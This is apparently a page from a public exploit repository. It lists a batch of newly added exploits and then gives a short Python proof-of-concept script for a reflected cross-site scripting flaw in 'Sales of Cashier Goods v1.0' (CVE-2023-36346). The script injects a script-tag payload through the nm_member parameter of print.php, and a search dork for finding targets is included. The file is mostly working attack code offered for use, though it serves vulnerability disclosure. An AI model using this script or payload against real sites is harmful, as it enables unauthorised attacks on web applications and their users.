ef9b4e5962
20 changes to exploits/shellcodes/ghdb TP-Link TL-WR940N V4 - Buffer OverFlow D-Link DAP-1325 - Broken Access Control Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS) Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE) Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE) FuguHub 8.1 - Remote Code Execution GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS) PodcastGenerator 3.2.9 - Blind SSRF via XML Injection POS Codekop v2.0 - Authenticated Remote Code Execution (RCE) Prestashop 8.0.4 - Cross-Site Scripting (XSS) Rukovoditel 3.4.1 - Multiple Stored XSS Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS) spip v4.1.10 - Spoofing Admin account Time Slot Booking Calendar 1.8 - Stored Cross-Site Scripting (XSS) Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS) WBCE CMS 1.6.1 - Open Redirect & CSRF WebsiteBaker v2.13.3 - Directory Traversal WebsiteBaker v2.13.3 - Stored XSS WP AutoComplete 1.0.4 - Unauthenticated SQLi
28 lines
No EOL
783 B
Python
Executable file
28 lines
No EOL
783 B
Python
Executable file
# Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
|
|
# Date: 2023-06-23
|
|
# country: Iran
|
|
# Exploit Author: Amirhossein Bahramizadeh
|
|
# Category : webapps
|
|
# Dork : /print.php?nm_member=
|
|
# Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html
|
|
# Tested on: Windows/Linux
|
|
# CVE : CVE-2023-36346
|
|
|
|
import requests
|
|
import urllib.parse
|
|
|
|
# Set the target URL and payload
|
|
url = "http://example.com/print.php"
|
|
payload = "<script>alert('XSS')</script>"
|
|
|
|
# Encode the payload for URL inclusion
|
|
payload = urllib.parse.quote(payload)
|
|
|
|
# Build the request parameters
|
|
params = {
|
|
"nm_member": payload
|
|
}
|
|
|
|
# Send the request and print the response
|
|
response = requests.get(url, params=params)
|
|
print(response.text) |